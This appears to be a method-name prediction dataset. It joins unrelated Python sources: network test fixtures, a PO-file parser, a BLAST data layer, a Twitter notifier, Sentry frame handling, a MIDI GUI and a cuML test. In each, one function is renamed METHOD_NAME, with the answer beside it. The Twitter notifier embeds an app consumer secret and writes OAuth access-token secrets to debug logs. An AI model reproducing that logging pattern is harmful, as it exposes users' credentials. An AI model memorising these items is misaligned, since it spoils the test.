Dictionary containing minigraph information
"""
duthost = duthosts[rand_one_dut_hostname]
return duthost.get_extended_minigraph_facts(tbinfo)
def get_intf_from_ip(local_ip, config_facts):
for intf, config in list(config_facts["INTERFACE"].items()):
for ip in config:
intf_ip = ip_interface(ip)
if str(intf_ip.ip) == local_ip:
return intf, intf_ip
@pytest.fixture(params=["no-underlay-route", "with-underlay-route"])
def use_underlay_route(request):
if request.param == "with-underlay-route":
pytest.skip("Underlay route not supported yet")
return request.param == "with-underlay-route"
@pytest.fixture(scope="function")
def dash_config_info(duthost, config_facts, METHOD_NAME):
dash_info = {
ENI: "F4939FEFC47E",
VM_VNI: 4321,
VNET1_VNI: 1000,
VNET1_NAME: "Vnet1",
VNET2_VNI: 2000,
VNET2_NAME: "Vnet2",
REMOTE_CA_IP: "20.2.2.2",
LOCAL_CA_IP: "11.1.1.1",
REMOTE_ENI_MAC: "F9:22:83:99:22:A2",
LOCAL_ENI_MAC: "F4:93:9F:EF:C4:7E",
REMOTE_CA_PREFIX: "20.2.2.0/24",
}
loopback_intf_ip = ip_interface(list(list(config_facts["LOOPBACK_INTERFACE"].values())[0].keys())[0])
dash_info[LOOPBACK_IP] = str(loopback_intf_ip.ip)
dash_info[DUT_MAC] = config_facts["DEVICE_METADATA"]["localhost"]["mac"]
neigh_table = duthost.switch_arptable()['ansible_facts']['arptable']
for neigh_ip, config in list(config_facts["BGP_NEIGHBOR"].items()):
# Pick the first two BGP neighbor IPs since these should already be learned on the DUT
if ip_interface(neigh_ip).version == 4:
if LOCAL_PA_IP not in dash_info:
dash_info[LOCAL_PA_IP] = neigh_ip
intf, _ = get_intf_from_ip(config['local_addr'], config_facts)
dash_info[LOCAL_PTF_INTF] = METHOD_NAME["minigraph_ptf_indices"][intf]
dash_info[LOCAL_PTF_MAC] = neigh_table["v4"][neigh_ip]["macaddress"]
elif REMOTE_PA_IP not in dash_info:
dash_info[REMOTE_PA_IP] = neigh_ip
intf, intf_ip = get_intf_from_ip(config['local_addr'], config_facts)
dash_info[REMOTE_PTF_INTF] = METHOD_NAME["minigraph_ptf_indices"][intf]
dash_info[REMOTE_PTF_MAC] = neigh_table["v4"][neigh_ip]["macaddress"]
dash_info[REMOTE_PA_PREFIX] = str(intf_ip.network)
break
return dash_info
@pytest.fixture(scope="function")
def apply_config(duthost, skip_config, skip_cleanup):
configs = []
op = "SET"
def _apply_config(config_info):
if skip_config:
return
if config_info not in configs:
configs.append(config_info)
config = "dash_basic_config"
template_name = "{}.j2".format(config)
dest_path = "/tmp/{}.json".format(config)
render_template_to_host(template_name, duthost, dest_path, config_info, op=op)
apply_swssconfig_file(duthost, dest_path)
yield _apply_config
op = "DEL"
if not skip_cleanup:
for config_info in reversed(configs):
_apply_config(config_info)
@pytest.fixture(scope="function")
def dash_inbound_configs(dash_config_info, use_underlay_route, METHOD_NAME):
if use_underlay_route:
dash_config_info[LOCAL_PA_IP] = u"30.30.30.30"
dash_config_info[LOCAL_PTF_INTF] = list(METHOD_NAME["minigraph_ptf_indices"].values())
else:
dash_config_info[LOCAL_PTF_INTF] = [dash_config_info[LOCAL_PTF_INTF]]
logger.info("Testing with config {}".format(dash_config_info))
return dash_config_info
@pytest.fixture(scope="function")
def apply_inbound_configs(dash_inbound_configs, apply_config):
dash_inbound_configs[ROUTING_ACTION] = "vnet"
apply_config(dash_inbound_configs)
@pytest.fixture(scope="function")
def dash_outbound_configs(dash_config_info, use_underlay_route, METHOD_NAME):
if use_underlay_route:
dash_config_info[REMOTE_PA_IP] = u"30.30.30.30"
dash_config_info[REMOTE_PA_PREFIX] = "30.30.30.30/32"
dash_config_info[REMOTE_PTF_INTF] = list(METHOD_NAME["minigraph_ptf_indices"].values())
else:
dash_config_info[REMOTE_PTF_INTF] = [dash_config_info[REMOTE_PTF_INTF]]
logger.info("Testing with config {}".format(dash_config_info))
return dash_config_info
@pytest.fixture(scope="function")
def apply_vnet_configs(dash_outbound_configs, apply_config):
dash_outbound_configs[ROUTING_ACTION] = "vnet"
apply_config(dash_outbound_configs)
@pytest.fixture(scope="function")
def apply_vnet_direct_configs(dash_outbound_configs, apply_config):
dash_outbound_configs[ROUTING_ACTION] = "vnet_direct"
dash_outbound_configs[ROUTING_ACTION_TYPE] = "maprouting"
dash_outbound_configs[LOOKUP_OVERLAY_IP] = "1.1.1.1"
apply_config(dash_outbound_configs)
@pytest.fixture(scope="function")
def apply_direct_configs(dash_outbound_configs, apply_config):
dash_outbound_configs[ROUTING_ACTION] = "direct"
del dash_outbound_configs[VNET2_NAME]
apply_config(dash_outbound_configs) | null |
merge on | #
# Copyright 2002-2011 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import re
from urllib import parse
from translate.storage import base, poheader
from translate.storage.workflow import StateEnum as state
msgid_comment_re = re.compile("_: (.*?)\n")
def extract_msgid_comment(text):
"""The one definitive way to extract a msgid comment out of an unescaped
unicode string that might contain it.
:rtype: unicode
"""
msgidcomment = msgid_comment_re.match(text)
if msgidcomment:
return msgidcomment.group(1)
return ""
def quote_plus(text):
"""Quote the query fragment of a URL; replacing ' ' with '+'"""
return parse.quote_plus(text.encode("utf-8"), safe="[]()/:,@")
def unquote_plus(text):
"""unquote('%7e/abc+def') -> '~/abc def'"""
try:
# Enforce utf-8 validation
return parse.unquote_plus(text, errors="strict")
except (UnicodeEncodeError, UnicodeDecodeError):
# for some reason there is a non-ascii character here. Let's assume it
# is already unicode (because of originally decoding the file)
return text
class pounit(base.TranslationUnit):
S_FUZZY_OBSOLETE = state.OBSOLETE - 1
S_OBSOLETE = state.OBSOLETE
S_UNTRANSLATED = state.EMPTY
S_FUZZY = state.NEEDS_WORK
S_TRANSLATED = state.UNREVIEWED
STATE = {
S_FUZZY_OBSOLETE: (S_FUZZY_OBSOLETE, state.OBSOLETE),
S_OBSOLETE: (state.OBSOLETE, state.EMPTY),
S_UNTRANSLATED: (state.EMPTY, state.NEEDS_WORK),
S_FUZZY: (state.NEEDS_WORK, state.UNREVIEWED),
S_TRANSLATED: (state.UNREVIEWED, state.MAX),
}
def adderror(self, errorname, errortext):
"""Adds an error message to this unit."""
text = f"(pofilter) {errorname}: {errortext}"
# Don't add the same error twice:
if text not in self.getnotes(origin="translator"):
self.addnote(text, origin="translator")
def geterrors(self):
"""Get all error messages."""
notes = self.getnotes(origin="translator").split("\n")
errordict = {}
for note in notes:
if "(pofilter) " in note:
error = note.replace("(pofilter) ", "")
errorname, errortext = error.split(": ", 1)
errordict[errorname] = errortext
return errordict
def markreviewneeded(self, needsreview=True, explanation=None):
"""Marks the unit to indicate whether it needs review. Adds an optional explanation as a note."""
if needsreview:
reviewnote = "(review)"
if explanation:
reviewnote += " " + explanation
self.addnote(reviewnote, origin="translator")
else:
# Strip (review) notes.
notestring = self.getnotes(origin="translator")
notes = notestring.split("\n")
newnotes = []
for note in notes:
if "(review)" not in note:
newnotes.append(note)
newnotes = "\n".join(newnotes)
self.removenotes()
self.addnote(newnotes, origin="translator")
def istranslated(self):
return super().istranslated() and not self.isobsolete() and not self.isheader()
def istranslatable(self):
return not (self.isheader() or self.isblank() or self.isobsolete())
def hasmarkedcomment(self, commentmarker):
raise NotImplementedError
def isreview(self):
return self.hasmarkedcomment("review") or self.hasmarkedcomment("pofilter")
def isobsolete(self):
return (
self.STATE[self.S_FUZZY_OBSOLETE][0]
<= self.get_state_n()
< self.STATE[self.S_OBSOLETE][1]
)
def isfuzzy(self):
# implementation specific fuzzy detection, must not use get_state_n()
raise NotImplementedError()
def markfuzzy(self, present=True):
if present:
self.set_state_n(self.STATE[self.S_FUZZY][0])
else:
self.set_state_n(self.STATE[self.S_TRANSLATED][0])
# set_state_n will check if target exists
def makeobsolete(self):
if self.isfuzzy():
self.set_state_n(self.STATE[self.S_FUZZY_OBSOLETE][0])
else:
self.set_state_n(self.STATE[self.S_OBSOLETE][0])
def resurrect(self):
self.set_state_n(self.STATE[self.S_TRANSLATED][0])
if not self.target:
self.set_state_n(self.STATE[self.S_UNTRANSLATED][0])
def _domarkfuzzy(self, present=True):
raise NotImplementedError()
def get_state_n(self):
value = super().get_state_n()
if value <= self.S_OBSOLETE:
return value
if self.target:
if self.isfuzzy():
return self.S_FUZZY
else:
return self.S_TRANSLATED
else:
return self.S_UNTRANSLATED
def set_state_n(self, value):
super().set_state_n(value)
has_target = False
if self.hasplural():
for string in self.target.strings:
if string:
has_target = True
break
else:
has_target = bool(self.target)
if has_target:
isfuzzy = (
self.STATE[self.S_FUZZY][0] <= value < self.STATE[self.S_FUZZY][1]
or self.STATE[self.S_FUZZY_OBSOLETE][0]
<= value
< self.STATE[self.S_FUZZY_OBSOLETE][1]
)
self._domarkfuzzy(isfuzzy) # Implementation specific fuzzy-marking
else:
super().set_state_n(self.S_UNTRANSLATED)
self._domarkfuzzy(False)
class pofile(poheader.poheader, base.TranslationStore):
Name = "Gettext PO file" # pylint: disable=E0602
Mimetypes = [
"text/x-gettext-catalog",
"text/x-gettext-translation",
"text/x-po",
"text/x-pot",
]
Extensions = ["po", "pot"]
# We don't want windows line endings on Windows:
_binary = True
def __init__(self, inputfile=None, noheader=False, **kwargs):
super().__init__(**kwargs)
self.filename = ""
if inputfile is not None:
self.parse(inputfile)
elif not noheader:
self.init_headers()
@property
def METHOD_NAME(self):
"""The matching criterion to use when merging on."""
return self.parseheader().get("X-Merge-On", "id") | null |
get nuvs blast | from logging import getLogger
from typing import List, TYPE_CHECKING
from zipfile import BadZipFile
from aiohttp import ClientSession
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncEngine, AsyncSession
from virtool_core.models.blast import NuvsBlast
import virtool.utils
from virtool.analyses.utils import find_nuvs_sequence_by_index
from virtool.blast.db import METHOD_NAME, delete_nuvs_blast
from virtool.blast.models import SQLNuVsBlast
from virtool.blast.task import BLASTTask
from virtool.blast.utils import (
extract_blast_info,
fetch_ncbi_blast_html,
check_rid,
)
from virtool.blast.utils import format_blast_content, fetch_nuvs_blast_result
from virtool.data.errors import ResourceNotFoundError
from virtool.data.piece import DataLayerPiece
from virtool.types import Document
if TYPE_CHECKING:
from virtool.mongo.core import Mongo
logger = getLogger(__name__)
class BLASTData(DataLayerPiece):
"""
A data layer piece for BLAST data.
"""
name = "blast"
def __init__(self, client: ClientSession, mongo: "Mongo", pg: AsyncEngine):
self._client = client
self._mongo = mongo
self._pg = pg
async def create_nuvs_blast(
self, analysis_id: str, sequence_index: int
) -> NuvsBlast:
"""
Create a NuVs BLAST record for the sequence associated with a specific analysis
ID and sequence index.
A task will be spawned that runs a BLAST search against NCBI and populates the
database with result. The analysis and BLAST records are updated as the task
proceeds.
:param analysis_id: the ID for the analysis to create BLAST for
:param sequence_index: the index of the sequence being BLASTed.
:return: the dictionary representation of the BLAST record.
"""
created_at = virtool.utils.timestamp()
async with AsyncSession(self._pg) as session:
await delete_nuvs_blast(session, analysis_id, sequence_index)
await session.flush()
blast_row = SQLNuVsBlast(
analysis_id=analysis_id,
created_at=created_at,
last_checked_at=created_at,
ready=False,
sequence_index=sequence_index,
updated_at=created_at,
)
session.add(blast_row)
await session.flush()
await self.data.tasks.create(
BLASTTask,
{"analysis_id": analysis_id, "sequence_index": sequence_index},
)
blast = NuvsBlast(**blast_row.to_dict())
# Don't commit until the task has been created.
await session.commit()
await self._mongo.analyses.update_one(
{"_id": analysis_id}, {"$set": {"updated_at": created_at}}
)
return blast
async def initialize_on_ncbi(self, analysis_id: str, sequence_index: int):
"""
Send a request to NCBI to BLAST the passed sequence.
Return the RID and RTOE from the response.
:param analysis_id: the id the nuvs analysis
:param sequence_index: the index of the sequence
:return: the RID and RTOE for the request
"""
analysis = await self.data.analyses.get(analysis_id, None)
sequence = find_nuvs_sequence_by_index(
analysis.dict(by_alias=True), sequence_index
)
html = await fetch_ncbi_blast_html(self._client, sequence)
rid, _ = extract_blast_info(html)
async with AsyncSession(self._pg) as session:
blast_row = await METHOD_NAME(session, analysis_id, sequence_index)
if blast_row is None:
raise ResourceNotFoundError
blast_row.rid = rid
blast = NuvsBlast(**blast_row.to_dict())
await session.commit()
return blast
async def METHOD_NAME(self, analysis_id: str, sequence_index: int) -> NuvsBlast:
"""
Get a NuVs BLAST record by its analysis ID and sequence index.
:param analysis_id:
:param sequence_index:
:return: the dictionary representation of the BLAST record
"""
async with AsyncSession(self._pg) as session:
blast = await METHOD_NAME(session, analysis_id, sequence_index)
return NuvsBlast(**blast.to_dict())
async def check_nuvs_blast(
self,
analysis_id: str,
sequence_index: int,
):
"""
Sync our BLAST resource with NCBI.
Send a request to NCBI to check on the status of a BLAST request. Update the
``last_checked_at`` field.
If the BLAST result is ready:
1. Set the `ready` field to `true`.
2. Download the result and set the JSON as the value of the `result` field.
If an error is encountered while parsing the result, the `error` field is set.
"""
updated_at = virtool.utils.timestamp()
async with AsyncSession(self._pg) as session:
blast_row = await METHOD_NAME(session, analysis_id, sequence_index)
if blast_row is None:
raise ResourceNotFoundError
ready = await check_rid(self._client, blast_row.rid)
blast_row.last_checked_at = updated_at
blast_row.updated_at = updated_at
if ready:
try:
result_json = await fetch_nuvs_blast_result(
self._client, blast_row.rid
)
blast_row.result = format_blast_content(result_json)
blast_row.ready = True
except BadZipFile:
blast_row.error = "Unable to interpret NCBI result"
await session.flush()
await session.commit()
await self._mongo.analyses.update_one(
{"_id": analysis_id},
{"$set": {"updated_at": updated_at}},
)
return await self.METHOD_NAME(analysis_id, sequence_index)
async def delete_nuvs_blast(self, analysis_id: str, sequence_index: int) -> int:
"""
Remove a NuVs BLAST record.
:param analysis_id: the analysis the BLAST belongs to
:param sequence_index: the index of the BLASTed NuVs sequence
:return: the number of deleted records
"""
async with AsyncSession(self._pg) as session:
deleted_count = await delete_nuvs_blast(
session, analysis_id, sequence_index
)
await session.commit()
await self._mongo.analyses.update_one(
{"_id": analysis_id}, {"$set": {"updated_at": virtool.utils.timestamp()}}
)
return deleted_count
async def list_by_analysis(self, analysis_id: str) -> List[Document]:
"""
Get all BLAST records associated with an analysis.
:param analysis_id: the ID of the analysis to list BLASTs for
:return: a list of BLAST records
"""
async with AsyncSession(self._pg) as session:
result = await session.execute(
select(SQLNuVsBlast).where(SQLNuVsBlast.analysis_id == analysis_id)
)
return [
{
"id": blast.id,
"created_at": blast.created_at,
"updated_at": blast.updated_at,
"last_checked_at": blast.last_checked_at,
"interval": blast.interval,
"rid": blast.rid,
"ready": blast.ready,
"result": blast.result,
}
for blast in result.scalars()
] | null |
notify download | import requests
import twitter
from requests_oauthlib import OAuth1Session
from sickchill import logger, settings
from sickchill.oldbeard import common
class Notifier(object):
consumer_key = "vHHtcB6WzpWDG6KYlBMr8g"
consumer_hash = "zMqq5CB3f8cWKiRO2KzWPTlBanYmV0VYxSXZ0Pxds0E" # (consumer_secret)
REQUEST_TOKEN_URL = "https://api.twitter.com/oauth/request_token"
ACCESS_TOKEN_URL = "https://api.twitter.com/oauth/access_token"
AUTHORIZATION_URL = "https://api.twitter.com/oauth/authorize"
def notify_snatch(self, ep_name):
if settings.TWITTER_NOTIFY_ONSNATCH:
self._notify_twitter(common.notifyStrings[common.NOTIFY_SNATCH] + ": " + ep_name)
def METHOD_NAME(self, ep_name):
if settings.TWITTER_NOTIFY_ONDOWNLOAD:
self._notify_twitter(common.notifyStrings[common.NOTIFY_DOWNLOAD] + ": " + ep_name)
def notify_subtitle_download(self, ep_name, lang):
if settings.TWITTER_NOTIFY_ONSUBTITLEDOWNLOAD:
self._notify_twitter(common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD] + " " + ep_name + ": " + lang)
def notify_update(self, new_version="??"):
if settings.USE_TWITTER:
update_text = common.notifyStrings[common.NOTIFY_UPDATE_TEXT]
title = common.notifyStrings[common.NOTIFY_UPDATE]
self._notify_twitter(title + " - " + update_text + new_version)
def notify_login(self, ipaddress=""):
if settings.USE_TWITTER:
update_text = common.notifyStrings[common.NOTIFY_LOGIN_TEXT]
title = common.notifyStrings[common.NOTIFY_LOGIN]
self._notify_twitter(title + " - " + update_text.format(ipaddress))
def test_notify(self):
"""
Tests sending notification.
:return: True if succeeded, False otherwise
"""
return self._notify_twitter("This is a test notification from SickChill", force=True)
def _get_authorization(self):
"""
Step 1 of authorization - get app authorization url.
:return: True if succeeded, False otherwise
"""
logger.debug("Requesting temp token from Twitter")
oauth_session = OAuth1Session(client_key=self.consumer_key, client_secret=self.consumer_hash)
try:
request_token = oauth_session.fetch_request_token(self.REQUEST_TOKEN_URL)
except requests.exceptions.RequestException as error:
logger.exception(f"Invalid response from Twitter requesting temp token: {error}")
else:
settings.TWITTER_USERNAME = request_token["oauth_token"]
settings.TWITTER_PASSWORD = request_token["oauth_token_secret"]
return oauth_session.authorization_url(self.AUTHORIZATION_URL)
def _get_credentials(self, key):
logger.info("Type of key is {}".format(type(key)))
"""
Step 2 of authorization - poll server for access token.
:param key: Authorization key received from twitter
:return: True if succeeded, False otherwise
"""
logger.debug("Generating and signing request for an access token using key " + key)
oauth_session = OAuth1Session(
client_key=self.consumer_key,
client_secret=self.consumer_hash,
resource_owner_key=settings.TWITTER_USERNAME,
resource_owner_secret=settings.TWITTER_PASSWORD,
)
try:
access_token = oauth_session.fetch_access_token(self.ACCESS_TOKEN_URL, verifier=str(key))
except Exception as error:
logger.exception(f"The request for a token with did not succeed: {error}")
return False
logger.debug("Your Twitter Access Token key: {0}".format(access_token["oauth_token"]))
logger.debug("Access Token secret: {0}".format(access_token["oauth_token_secret"]))
settings.TWITTER_USERNAME = access_token["oauth_token"]
settings.TWITTER_PASSWORD = access_token["oauth_token_secret"]
return True
def _send_tweet(self, message=None):
"""
Sends a tweet.
:param message: Message to send
:return: True if succeeded, False otherwise
"""
api = twitter.Api(
consumer_key=self.consumer_key,
consumer_secret=self.consumer_hash,
access_token_key=settings.TWITTER_USERNAME,
access_token_secret=settings.TWITTER_PASSWORD,
)
logger.debug("Sending tweet: {}".format(message))
try:
api.PostUpdate(message[:139])
except Exception as error:
logger.exception(f"Error Sending Tweet: {error}")
return False
return True
def _send_dm(self, message=None):
"""
Sends a direct message.
:param message: Message to send
:return: True if succeeded, False otherwise
"""
dmdest = settings.TWITTER_DMTO
api = twitter.Api(
consumer_key=self.consumer_key,
consumer_secret=self.consumer_hash,
access_token_key=settings.TWITTER_USERNAME,
access_token_secret=settings.TWITTER_PASSWORD,
)
logger.debug("Sending DM @{0}: {1}".format(dmdest, message))
try:
api.PostDirectMessage(message[:139], screen_name=dmdest)
except Exception as error:
logger.exception(f"Error Sending Tweet (DM): {error}")
return False
return True
def _notify_twitter(self, message="", force=False):
prefix = settings.TWITTER_PREFIX
if not settings.USE_TWITTER and not force:
return False
if settings.TWITTER_USEDM and settings.TWITTER_DMTO:
return self._send_dm(prefix + ": " + message)
else:
return self._send_tweet(prefix + ": " + message) | null |
get crashing thread | from __future__ import annotations
from copy import deepcopy
from dataclasses import dataclass, field
from typing import (
Any,
Callable,
Mapping,
MutableMapping,
Optional,
Protocol,
Sequence,
Set,
Tuple,
cast,
)
from sentry.utils.safe import PathSearchable, get_path
# mypy hack to work around callable assuing the first arg of callable is 'self'
# https://github.com/python/mypy/issues/5485
class FrameMunger(Protocol):
def __call__(self, key: str, frame: MutableMapping[str, Any]) -> bool:
pass
@dataclass(frozen=True)
class SdkFrameMunger:
frame_munger: FrameMunger
requires_sdk: bool = False
supported_sdks: Set[str] = field(default_factory=set)
def java_frame_munger(key: str, frame: MutableMapping[str, Any]) -> bool:
if frame.get("filename") is None or frame.get("module") is None:
return False
if "/" not in str(frame.get("filename")) and frame.get("module"):
# Replace the last module segment with the filename, as the
# terminal element in a module path is the class
module = frame["module"].split(".")
module[-1] = frame["filename"]
frame[key] = "/".join(module)
return True
return False
def cocoa_frame_munger(key: str, frame: MutableMapping[str, Any]) -> bool:
if not frame.get("package") or not frame.get("abs_path"):
return False
rel_path = package_relative_path(frame.get("abs_path"), frame.get("package"))
if rel_path:
frame[key] = rel_path
return True
return False
def flutter_frame_munger(key: str, frame: MutableMapping[str, Any]) -> bool:
if not frame.get("abs_path"):
return False
abs_path = str(frame.get("abs_path"))
if abs_path.startswith("dart:"):
return False
elif abs_path.startswith("package:"):
if not frame.get("package"):
return False
pkg = frame.get("package")
if abs_path.find(f"package:{pkg}") == -1:
return False
else:
src_path = abs_path.replace(f"package:{pkg}", "", 1).strip("/")
if src_path:
frame[key] = src_path
return True
return False
def package_relative_path(abs_path: str | None, package: str | None) -> str | None:
"""
returns the left-biased shortened path relative to the package directory
"""
if not abs_path or not package:
return None
package = package.strip("/")
paths = abs_path.strip("/").split("/")
for idx, path in enumerate(paths):
if path == package:
return "/".join(paths[idx:])
return None
PLATFORM_FRAME_MUNGER: Mapping[str, SdkFrameMunger] = {
"java": SdkFrameMunger(java_frame_munger),
"cocoa": SdkFrameMunger(cocoa_frame_munger),
"other": SdkFrameMunger(flutter_frame_munger, True, {"sentry.dart.flutter"}),
}
def get_sdk_name(event_data: PathSearchable) -> Optional[str]:
return get_path(event_data, "sdk", "name", filter=True) or None
def munged_filename_and_frames(
platform: str,
data_frames: Sequence[Mapping[str, Any]],
key: str = "munged_filename",
sdk_name: str | None = None,
) -> Optional[Tuple[str, Sequence[Mapping[str, Any]]]]:
"""
Applies platform-specific frame munging for filename pathing.
Returns the key used to insert into the frames and a deepcopy of the input data_frames with munging applied,
otherwise returns None.
"""
munger = PLATFORM_FRAME_MUNGER.get(platform)
if not munger or (munger.requires_sdk and sdk_name not in munger.supported_sdks):
return None
copy_frames: Sequence[MutableMapping[str, Any]] = cast(
Sequence[MutableMapping[str, Any]], deepcopy(data_frames)
)
frames_updated = False
for frame in copy_frames:
frames_updated |= munger.frame_munger(key, frame)
return (key, copy_frames) if frames_updated else None
def METHOD_NAME(
thread_frames: Sequence[Mapping[str, Any]] | None
) -> Mapping[str, Any] | None:
if not thread_frames:
return None
if len(thread_frames) == 1:
return thread_frames[0]
filtered = [x for x in thread_frames if x and x.get("crashed")]
if len(filtered) == 1:
return filtered[0]
filtered = [x for x in thread_frames if x and x.get("current")]
if len(filtered) == 1:
return filtered[0]
return None
def find_stack_frames(
event_data: PathSearchable, consume_frame: Callable[[Any], None] = lambda _: None
) -> Sequence[Mapping[str, Any]]:
"""
See: https://develop.sentry.dev/sdk/event-payloads/#core-interfaces for event data payload format.
Waterfall logic for searching for stack frames in an event:
- `exception` interface for any 'stacktrace' frames.
- 'stacktrace' interface
- 'threads' interface for the relevant 'crashing' thread stack frames
"""
frames = []
stacktrace_in_exception = False
for exc in get_path(event_data, "exception", "values", filter=True) or ():
for frame in get_path(exc, "stacktrace", "frames", filter=True) or ():
consume_frame(frame)
frames.append(frame)
stacktrace_in_exception = True
if not stacktrace_in_exception:
# according to: https://develop.sentry.dev/sdk/event-payloads/stacktrace/
# stacktrace interface shouldn't be a top-level event property, so the next statement could be useless
# potentially here for backwards compatibility
frames = get_path(event_data, "stacktrace", "frames", filter=True) or []
if not frames:
threads = get_path(event_data, "threads", "values", filter=True) or get_path(
event_data, "threads", filter=True
)
thread = METHOD_NAME(threads)
if thread is not None:
frames = get_path(thread, "stacktrace", "frames") or []
for frame in frames or ():
consume_frame(frame)
return frames | null |
set select path | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#******************************************************************************
# ZYNTHIAN PROJECT: Zynthian GUI
#
# Zynthian GUI Midi-Channel Selector Class
#
# Copyright (C) 2015-2016 Fernando Moyano <[email protected]>
#
#******************************************************************************
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the LICENSE.txt file.
#
#******************************************************************************
import logging
from datetime import datetime
# Zynthian specific modules
from zyncoder.zyncore import lib_zyncore
from zyngui import zynthian_gui_config
from zyngui.zynthian_gui_selector import zynthian_gui_selector
#------------------------------------------------------------------------------
# Zynthian MIDI Channel Selection GUI Class
#------------------------------------------------------------------------------
class zynthian_gui_midi_chan(zynthian_gui_selector):
def __init__(self):
self.set_mode('ADD')
super().__init__('Channel', True)
def set_mode(self, mode, chan=None, chan_list=None):
self.mode = mode
if chan_list:
self.chan_list = chan_list
else:
self.chan_list = list(range(16))
self.midi_chan_sel = None
self.midi_chan_act = None
if self.mode=='ADD':
pass
elif self.mode=='SET':
self.index = self.get_midi_chan_index(chan)
elif self.mode=='CLONE':
self.midi_chan = chan
def fill_list(self):
self.list_data=[]
if self.mode=='ADD' or self.mode=='SET':
for i in self.chan_list:
if i==zynthian_gui_config.master_midi_channel:
continue
self.list_data.append((str(i+1),i,"MIDI CH#"+str(i+1)))
elif self.mode=='CLONE':
for i in self.chan_list:
if i in (self.midi_chan, zynthian_gui_config.master_midi_channel):
continue
elif lib_zyncore.get_midi_filter_clone(self.midi_chan, i):
cc_to_clone = lib_zyncore.get_midi_filter_clone_cc(self.midi_chan, i).nonzero()[0]
self.list_data.append((str(i+1),i,"[x] CH#{}, CC {}".format(i+1, ' '.join(map(str, cc_to_clone)))))
logging.debug("CC TO CLONE: {}".format(cc_to_clone))
else:
self.list_data.append((str(i+1),i,"[ ] CH#{}".format(i+1)))
super().fill_list()
def fill_listbox(self):
super().fill_listbox()
#if self.mode=='CLONE':
# self.highlight_cloned()
# Highlight current channels to which is cloned to ...
def highlight_cloned(self):
i=0
for item in self.list_data:
if item[2][:2]=='[x':
self.listbox.itemconfig(i, {'fg':zynthian_gui_config.color_hl})
else:
self.listbox.itemconfig(i, {'fg':zynthian_gui_config.color_panel_tx})
i += 1
def get_midi_chan_index(self, chan):
for i,ch in enumerate(self.chan_list):
if ch==chan:
return i
def select_action(self, i, t='S'):
selchan = self.list_data[i][1]
self.midi_chan_sel = selchan
if self.mode=='ADD':
self.zyngui.screens['layer'].add_layer_midich(selchan)
elif self.mode=='SET':
root_layer = self.zyngui.screens['layer_options'].layer
sublayers = self.zyngui.screens['layer'].get_fxchain_layers(root_layer) + self.zyngui.screens['layer'].get_midichain_layers(root_layer)
root_layer.set_midi_chan(selchan)
for layer in sublayers:
layer.set_midi_chan(selchan)
logging.info("LAYER {} -> MIDI CHANNEL = {}".format(layer.get_path(), selchan))
self.zyngui.zynautoconnect_midi()
self.zyngui.screens['audio_mixer'].refresh_visible_strips()
self.zyngui.set_active_channel()
self.zyngui.close_screen()
elif self.mode=='CLONE':
if selchan!=self.midi_chan:
if t=='S':
if lib_zyncore.get_midi_filter_clone(self.midi_chan, selchan):
lib_zyncore.set_midi_filter_clone(self.midi_chan, selchan, 0)
else:
lib_zyncore.set_midi_filter_clone(self.midi_chan, selchan, 1)
self.update_list()
logging.info("CLONE MIDI CHANNEL {} => {}".format(self.midi_chan, selchan))
elif t=='B':
self.clone_config_cc()
def clone_config_cc(self):
self.zyngui.screens['midi_cc'].config(self.midi_chan, self.midi_chan_sel)
self.zyngui.show_screen('midi_cc')
def midi_chan_activity(self, chan):
if self.shown and self.mode!='CLONE' and not zynthian_gui_config.midi_single_active_channel and not self.zyngui.zynseq.libseq.transportGetPlayStatus():
i = self.get_midi_chan_index(chan)
if i is not None and i!=self.index:
dts = (datetime.now()-self.last_index_change_ts).total_seconds()
selchan = self.list_data[self.index][1]
if (selchan==self.midi_chan_act and dts>0.2) or dts>2:
self.midi_chan_act = chan
self.select(i)
def METHOD_NAME(self):
if self.mode=='ADD' or self.mode=='SET':
self.select_path.set("MIDI Channel")
elif self.mode=='CLONE':
self.select_path.set("Clone MIDI Channel {} to ...".format(self.midi_chan+1))
#------------------------------------------------------------------------------ | null |
arr to similarity mat | # Copyright (c) 2020-2023, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cuml.common.exceptions import NotFittedError
import pytest
from cuml.internals.safe_imports import cpu_only_import
import cuml
from cuml.dask.preprocessing.LabelEncoder import LabelEncoder
from cuml.internals.safe_imports import gpu_only_import
cudf = gpu_only_import("cudf")
np = cpu_only_import("numpy")
dask_cudf = gpu_only_import("dask_cudf")
cp = gpu_only_import("cupy")
def METHOD_NAME(arr):
arr = arr.reshape(1, -1)
return np.pad(arr, [(arr.shape[1] - 1, 0), (0, 0)], "edge")
@pytest.mark.parametrize("length", [10, 1000])
@pytest.mark.parametrize("cardinality", [5, 10, 50])
def test_labelencoder_fit_transform(length, cardinality, client):
"""Try encoding the entire df"""
tmp = cudf.Series(np.random.choice(cardinality, (length,)))
df = dask_cudf.from_cudf(tmp, npartitions=len(client.has_what()))
encoded = cuml.dask.preprocessing.LabelEncoder().fit_transform(df)
df_arr = df.compute().to_numpy()
df_arr = METHOD_NAME(df_arr)
encoder_arr = cp.asnumpy(encoded.compute().to_numpy())
encoded_arr = METHOD_NAME(encoder_arr)
assert ((encoded_arr == encoded_arr.T) == (df_arr == df_arr.T)).all()
@pytest.mark.parametrize("length", [10, 100, 1000])
